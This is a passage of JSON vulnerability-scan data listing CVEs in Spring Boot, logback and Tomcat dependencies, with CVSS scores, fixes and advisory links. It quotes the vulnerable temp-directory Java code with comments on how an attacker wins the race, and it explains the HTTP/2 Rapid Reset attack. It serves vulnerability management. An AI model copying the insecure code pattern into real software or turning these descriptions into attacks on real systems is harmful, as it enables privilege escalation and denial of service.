Exploit","url":"http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html"},{"summary":"Siemens Advisory ssa-254054","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Sonicwall Advisory SNWLID-2022-0005","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005"},{"summary":"Vmware Advisory cve-2022-22965","url":"https://tanzu.vmware.com/security/cve-2022-22965"},{"summary":"Cisco Advisory cisco-sa-java-spring-rce-Zx9GUc67","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot-starter-web@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]}],"title":"CVE-2022-22965/pkg:maven/org.springframework.boot/spring-boot-starter-web@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-27772"]}],"cve":"CVE-2022-27772","cwe":{"id":"377","name":"Insecure Temporary File"},"discovery_date":"2022-07-11T20:59:02","ids":[{"system_name":"CVE Record","text":"CVE-2022-27772"},{"system_name":"GitHub Advisory","text":"GHSA-cm59-pr5q-cw85"}],"notes":[{"audience":"developers","category":"other","text":"Creation of Temporary File in Directory with Insecure Permissions","title":"Additional CWE: 379"},{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in org.springframework.boot:spring-boot"},{"category":"details","details":"Vulnerability Details","text":"# Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in org.springframework.boot:spring-boot spring-boot versions prior to version `v2.2.11.RELEASE` was vulnerable to temporary directory hijacking. This vulnerability impacted the `org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir` method.  The vulnerable method is used to create a work directory for embedded web servers such as Tomcat and Jetty. The directory contains configuration files, JSP/class files, etc. If a local attacker got the permission to write in this directory, they could completely take over the application (ie. local privilege escalation).  #### Impact Location  This vulnerability impacted the following source location:  ```java  /**   * Return the absolute temp dir for given web server.   * @param prefix server name   * @return the temp dir for given server.   */  protected final File createTempDir(String prefix) {   try {    File tempDir = File.createTempFile(prefix + \".\", \".\" + getPort());    tempDir.delete();    tempDir.mkdir();    tempDir.deleteOnExit();    return tempDir;   } ``` \\- https://github.com/spring-projects/spring-boot/blob/ce70e7d768977242a8ea6f93188388f273be5851/spring-boot-project/spring-boot/src/main/java/org/springframework/boot/web/server/AbstractConfigurableWebServerFactory.java#L165-L177  This vulnerability exists because `File.mkdir` returns `false` when it fails to create a directory, it does not throw an exception. As such, the following race condition exists:  ```java File tmpDir =File.createTempFile(prefix + \".\", \".\" + getPort()); // Attacker knows the full path of the file that will be generated // delete the file that was created tmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty. // and make a directory of the same name // SECURITY VULNERABILITY: Race Condition! - Attacker beats java code and now owns this directory tmpDir.mkdirs(); // This method returns 'false' because it was unable to create the directory. No exception is thrown. // Attacker can write any new files to this directory that they wish. // Attacker can read any files created by this process. ```  ### Prerequisites  This vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.  ### Patches  This vulnerability was inadvertently fixed as a part of this patch: https://github.com/spring-projects/spring-boot/commit/667ccdae84822072f9ea1a27ed5c77964c71002d  This vulnerability is patched in versions `v2.2.11.RELEASE` or later.  ### Workarounds  Setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot@vers:maven/>=1.0.0.RELEASE|<=2.2.9.RELEASE"]},"references":[{"summary":"GitHub Advisory GHSA-cm59-pr5q-cw85","url":"https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-cm59-pr5q-cw85"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-27772"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-27772"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.9,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"CHANGED","temporalScore":7.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot@vers:maven/>=1.0.0.RELEASE|<=2.2.9.RELEASE"]}],"title":"CVE-2022-27772/pkg:maven/org.springframework.boot/spring-boot@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-20883"]}],"cve":"CVE-2023-20883","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-05-26T18:30:21","ids":[{"system_name":"CVE Record","text":"CVE-2023-20883"},{"system_name":"NetApp Advisory","text":"ntap-20230703-0008"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Boot Welcome Page Denial of Service"},{"category":"details","details":"Vulnerability Details","text":"# Spring Boot Welcome Page Denial of Service In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache.  Specifically, an application is vulnerable if all of the conditions are true:  * The application has Spring MVC auto-configuration enabled. This is the case by default if Spring MVC is on the classpath. * The application makes use of Spring Boot's welcome page support, either static or templated. * Your application is deployed behind a proxy which caches 404 responses.  Your application is NOT vulnerable if any of the following are true:  * Spring MVC auto-configuration is disabled. This is true if WebMvcAutoConfiguration is explicitly excluded, if Spring MVC is not on the classpath, or if spring.main.web-application-type is set to a value other than SERVLET. * The application does not use Spring Boot's welcome page support. * You do not have a proxy which caches 404 responses.   Affected Spring Products and Versions  Spring Boot  3.0.0 to 3.0.6 2.7.0 to 2.7.11 2.6.0 to 2.6.14 2.5.0 to 2.5.14  Older, unsupported versions are also affected Mitigation  Users of affected versions should apply the following mitigations:  * 3.0.x users should upgrade to 3.0.7+ * 2.7.x users should upgrade to 2.7.12+ * 2.6.x users should upgrade to 2.6.15+ * 2.5.x users should upgrade to 2.5.15+  Users of older, unsupported versions should upgrade to 3.0.7+ or 2.7.12+.  Workarounds: configure the reverse proxy not to cache 404 responses and/or not to cache responses to requests to the root (/) of the application."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-autoconfigure@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20883"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20883"},{"summary":"NetApp Advisory ntap-20230703-0008","url":"https://security.netapp.com/advisory/ntap-20230703-0008"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20883"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot-autoconfigure@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]}],"title":"CVE-2023-20883/pkg:maven/org.springframework.boot/spring-boot-autoconfigure@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-6378"]}],"cve":"CVE-2023-6378","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2023-11-29T12:30:16","ids":[{"system_name":"CVE Record","text":"CVE-2023-6378"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"logback serialization vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# logback serialization vulnerability A serialization vulnerability in logback receiver component part of logback allows an attacker to mount a Denial-Of-Service attack by sending poisoned data.  This is only exploitable if logback receiver component is deployed. See https://logback.qos.ch/manual/receivers.html"}],"product_status":{"known_affected":["ch.qos.logback/logback-classic@vers:maven/>=0.2.5|<=1.2.12"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-6378"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-6378"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.1,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.1,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":7.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H","version":"3.1"},"products":["ch.qos.logback/logback-classic@vers:maven/>=0.2.5|<=1.2.12"]}],"title":"CVE-2023-6378/pkg:maven/ch.qos.logback/logback-classic@1.1.9?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-42550"]}],"cve":"CVE-2021-42550","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-17T20:00:50","ids":[{"system_name":"CVE Record","text":"CVE-2021-42550"},{"system_name":"NetApp Advisory","text":"ntap-20211229-0001"},{"system_name":"Siemens Advisory","text":"ssa-371761"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in logback"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in logback In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers."}],"product_status":{"known_affected":["ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"summary":"Siemens Advisory ssa-371761","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-371761.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42550"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42550"},{"summary":"NetApp Advisory ntap-20211229-0001","url":"https://security.netapp.com/advisory/ntap-20211229-0001"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"]}],"title":"CVE-2021-42550/pkg:maven/ch.qos.logback/logback-core@1.1.9?type=jar"},{"cve":"CVE-2023-44487","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-10-10T21:28:24","ids":[{"system_name":"Microsoft Advisory","text":"2"},{"system_name":"Hashicorp Advisory","text":"59715"},{"system_name":"Swift Advisory","text":"67764"},{"system_name":"Amazon Advisory","text":"AWS-2023-011"},{"system_name":"CVE Record","text":"CVE-2023-44487"},{"system_name":"GitHub Advisory","text":"GHSA-2m7v-gc89-fjqf"},{"system_name":"GitHub Advisory","text":"GHSA-qppj-fm5r-hxr3"},{"system_name":"GitHub Advisory","text":"GHSA-vx74-f528-fxqg"},{"system_name":"GitHub Advisory","text":"GHSA-xpw8-rcwv-8f8p"},{"system_name":"Phoronix Advisory","text":"HTTP2-Rapid-Reset-Attack"},{"system_name":"F5 Advisory","text":"K000137106"},{"system_name":"Freebsd Advisory","text":"commit"},{"system_name":"Red Hat Advisory","text":"cve-2023-44487"},{"system_name":"Qualys Advisory","text":"cve-2023-44487-http-2-rapid-reset-attack"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"Debian Advisory","text":"dsa-5540"},{"system_name":"Debian Advisory","text":"dsa-5549"},{"system_name":"Debian Advisory","text":"dsa-5558"},{"system_name":"Debian Advisory","text":"dsa-5570"},{"system_name":"Gentoo Advisory","text":"glsa-202311-09"},{"system_name":"Google Advisory","text":"google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"},{"system_name":"Haproxy Advisory","text":"haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487"},{"system_name":"Arstechnica Advisory","text":"how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size"},{"system_name":"Google Advisory","text":"how-it-works-the-novel-http2-rapid-reset-ddos-attack"},{"system_name":"Nginx Advisory","text":"http-2-rapid-reset-attack-impacting-f5-nginx-products"},{"system_name":"Openssf Advisory","text":"http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response"},{"system_name":"Theregister Advisory","text":"http2_rapid_reset_zeroday"},{"system_name":"Seanmonstar Advisory","text":"hyper-http2-rapid-reset-unaffected"},{"system_name":"Darkreading Advisory","text":"internet-wide-zero-day-bug-fuels-largest-ever-ddos-event"},{"system_name":"Eclipse Advisory","text":"msg00181"},{"system_name":"Netlify Advisory","text":"netlify-successfully-mitigates-cve-2023-44487"},{"system_name":"Bleepingcomputer Advisory","text":"new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records"},{"system_name":"NetApp Advisory","text":"ntap-20231016-0001"},{"system_name":"NetApp Advisory","text":"ntap-20240426-0007"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0007"},{"system_name":"Proxmox Bugzilla","text":"proxmox-bugzilla-4988"},{"system_name":"Litespeedtech Advisory","text":"rapid-reset-http-2-vulnerablilty"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-2242803"},{"system_name":"Suse Bugzilla","text":"suse-bugzilla-1216123"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"HTTP/2 Stream Cancellation Attack"},{"category":"details","details":"Vulnerability Details","text":"# HTTP/2 Stream Cancellation Attack ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.  Abuse of this feature is called a Rapid Reset attack because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open.   The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately.  The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth.  In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.  Multiple software artifacts implementing HTTP/2 are affected. This advisory was originally ingested from the `swift-nio-http2` repo advisory and their original conent follows.  ## swift-nio-http2 specific advisory swift-nio-http2 is vulnerable to a denial-of-service vulnerability in which a malicious client can create and then reset a large number of HTTP/2 streams in a short period of time. This causes swift-nio-http2 to commit to a large amount of expensive work which it then throws away, including creating entirely new `Channel`s to serve the traffic. This can easily overwhelm an `EventLoop` and prevent it from making forward progress.  swift-nio-http2 1.28 contains a remediation for this issue that applies reset counter using a sliding window. This constrains the number of stream resets that may occur in a given window of time. Clients violating this limit will have their connections torn down. This allows clients to continue to cancel streams for legitimate reasons, while constraining malicious actors.  ## Related CVE(s) BIT-apisix-2023-44487, BIT-aspnet-core-2023-44487, BIT-contour-2023-44487, BIT-dotnet-2023-44487, BIT-dotnet-sdk-2023-44487, BIT-envoy-2023-44487, BIT-golang-2023-44487, BIT-jenkins-2023-44487, BIT-kong-2023-44487, BIT-nginx-2023-44487, BIT-nginx-ingress-controller-2023-44487, BIT-node-2023-44487, BIT-solr-2023-44487, BIT-tomcat-2023-44487, BIT-varnish-2023-44487, CVE-2023-44487"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/13/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/13/9"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/18/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/18/8"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/19/6"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/20/8"},{"summary":"Red Hat Advisory cve-2023-44487","url":"https://access.redhat.com/security/cve/cve-2023-44487"},{"summary":"Arstechnica Advisory how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size","url":"https://arstechnica.com/security/2023/10/how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size"},{"summary":"Amazon Advisory AWS-2023-011","url":"https://aws.amazon.com/security/security-bulletins/AWS-2023-011"},{"summary":"Litespeedtech Advisory rapid-reset-http-2-vulnerablilty","url":"https://blog.litespeedtech.com/2023/10/11/rapid-reset-http-2-vulnerablilty"},{"summary":"Qualys Advisory cve-2023-44487-http-2-rapid-reset-attack","url":"https://blog.qualys.com/vulnerabilities-threat-research/2023/10/10/cve-2023-44487-http-2-rapid-reset-attack"},{"summary":"Cve 2023","url":"https://blog.vespa.ai/cve-2023-44487"},{"summary":"Proxmox Bugzilla","url":"https://bugzilla.proxmox.com/show_bug.cgi?id=4988"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=2242803"},{"summary":"Suse Bugzilla","url":"https://bugzilla.suse.com/show_bug.cgi?id=1216123"},{"summary":"Freebsd Advisory","url":"https://cgit.freebsd.org/ports/commit/?id=c64c329c2c1752f46b73e3e6ce9f4329be6629f9"},{"summary":"Google Advisory google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps","url":"https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"},{"summary":"Google Advisory how-it-works-the-novel-http2-rapid-reset-ddos-attack","url":"https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack"},{"summary":"Hashicorp Advisory 59715","url":"https://discuss.hashicorp.com/t/hcsec-2023-32-vault-consul-and-boundary-affected-by-http-2-rapid-reset-denial-of-service-vulnerability-cve-2023-44487/59715"},{"summary":"Swift Advisory 67764","url":"https://forums.swift.org/t/swift-nio-http2-security-update-cve-2023-44487-http-2-dos/67764"},{"summary":"GitHub Advisory GHSA-qppj-fm5r-hxr3","url":"https://github.com/advisories/GHSA-qppj-fm5r-hxr3"},{"summary":"GitHub Advisory GHSA-vx74-f528-fxqg","url":"https://github.com/advisories/GHSA-vx74-f528-fxqg"},{"summary":"GitHub Advisory GHSA-xpw8-rcwv-8f8p","url":"https://github.com/advisories/GHSA-xpw8-rcwv-8f8p"},{"summary":"GitHub Advisory GHSA-qppj-fm5r-hxr3","url":"https://github.com/apple/swift-nio-http2/security/advisories/GHSA-qppj-fm5r-hxr3"},{"summary":"GitHub Advisory GHSA-2m7v-gc89-fjqf","url":"https://github.com/h2o/h2o/security/advisories/GHSA-2m7v-gc89-fjqf"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo/m/UDd7VKQuAAAJ"},{"summary":"Cve 2023","url":"https://linkerd.io/2023/10/12/linkerd-cve-2023-44487"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/5py8h42mxfsn8l1wy6o41xwhsjlsd87q"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00023.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00024.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00045.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00047.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/11/msg00001.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/11/msg00012.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MBEPPC36UBVOZZNAXFHKLFGSLCMN5LI"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WE2I52RHNNU42PX6NZ2RBUHSFFJ2LVZX"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY"},{"summary":"Fedora Project Mailing 